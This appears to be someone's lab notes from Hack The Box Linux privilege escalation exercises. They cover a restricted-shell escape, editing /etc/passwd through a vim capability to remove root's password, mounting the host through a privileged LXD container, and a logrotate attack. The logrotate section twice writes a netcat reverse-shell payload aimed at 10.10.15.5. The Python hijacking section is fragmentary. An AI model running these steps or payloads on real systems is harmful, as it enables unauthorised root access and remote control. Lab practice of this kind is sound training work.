LINUX PRIVILEGE ESCALATION
ESCAPING RESTRICTED SHELLS:
htb-user@ubuntu:~$ while read line; do
> echo $line;
> done <flag.txt
HTB{35c4p3_7h3_r3stricted_5h311}
htb-user@ubuntu:~$
CAPABILITIES
htb-student@ubuntu:~$ cat /etc/passwd | head -n1
root:x:0:0:root:/root:/bin/bash
htb-student@ubuntu:~$ /usr/bin/vim.basic /etc/passwd
*** delete the x in that line using VIM and saving with :x! ***
htb-student@ubuntu:~$ cat /etc/passwd | head -n1
root::0:0:root:/root:/bin/bash
htb-student@ubuntu:~$ su root
root@ubuntu:/home/htb-student# whoami
root
root@ubuntu:/home/htb-student# cd /
root@ubuntu:/# ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
root@ubuntu:/# cd root
root@ubuntu:~# ls
flag.txt snap
root@ubuntu:~# cat flag.txt
HTB{c4paBili7i3s_pR1v35c}
CONTAINERS:
htb-student@ubuntu:~$ id
uid=1000(htb-student) gid=1000(htb-student) groups=1000(htb-student),116(lxd)
htb-student@ubuntu:~$ cd ContainerImages
htb-student@ubuntu:~/ContainerImages$ ls
alpine-v3.18-x86_64-20230607_1234.tar.gz
htb-student@ubuntu:~/ContainerImages$ lxc image import alpine-v3.18-x86_64-
20230607_1234.tar.gz --alias Alpine
htb-student@ubuntu:~/ContainerImages$ lxc image list
+--------+--------------+--------+-------------------------------+--------------
+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE |
TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------
+-----------+--------+-------------------------------+
| Alpine | b14f17d61b9d | no | alpine v3.18 (20230607_12:34) | x86_64 |
CONTAINER | 3.62MB | Jun 23, 2023 at 11:44pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------
+-----------+--------+-------------------------------+
htb-student@ubuntu:~/ContainerImages$ lxc init Alpine privesc -c
security.privileged=true
Creating privesc
htb-student@ubuntu:~/ContainerImages$ lxc config device add privesc host-root disk
source=/ path=/mnt/root recursive=true
Device host-root added to privesc
htb-student@ubuntu:/$ lxc exec privesc /bin/bash
Error: Command not found
htb-student@ubuntu:/$ lxc exec privesc /bin/sh
~ # whoami
�root
~ # cd /
/ # find / -name flag.txt
~~~lots and lots of permission denied folders as below~~~
/mnt/root/root/flag.txt <----- FOUND IT!
find: /proc/sys/fs/binfmt_misc: Permission denied
find: /sys/kernel/tracing: Permission denied
find: /sys/kernel/debug: Permission denied
find: /sys/kernel/config: Permission denied
/ # cat /mnt/root/root/flag.txt
HTB{C0nT41n3rs_uhhh}
LOGROTATE
htb-student@ubuntu:~$ logrotate --version
logrotate 3.11.0
htb-student@ubuntu:~$ cat /etc/logrotate.conf
cat: /etc/logrotate.conf: No such file or directory
htb-student@ubuntu:~$ find / -name logrotate.conf 2>/dev/null
/snap/lxd/24918/etc/logrotate.conf
/snap/lxd/23889/etc/logrotate.conf
htb-student@ubuntu:~$ cat /snap/lxd/24918/etc/logrotate.conf
/var/snap/lxd/common/lxd/logs/lxd.log {
copytruncate
rotate 7
delaycompress
compress
notifempty
missingok
minage 1
}
htb-student@ubuntu:~$ cat /snap/lxd/23889/etc/logrotate.conf
/var/snap/lxd/common/lxd/logs/lxd.log {
copytruncate
rotate 7
delaycompress
compress
notifempty
missingok
minage 1
}
echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash 10.10.15.5 9001 &); fi"
> /home/htb-student/backups/access.log.1
Python Library Hijacking
def virtual_memory():
global _TOTAL_PHYMEM
ret = _psplatform.virtual_memory()
� # cached for later use in Process.memory_percent()
_TOTAL_PHYMEM = ret.total
return ret
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash 10.10.15.5 9001 &); fi" >
payloadfile
./logrotten -p ./payload /home/htb-student/backups/access.log
ls -l /etc/bash_completion.d/
find / -name mem_stats.py 2>/dev/null
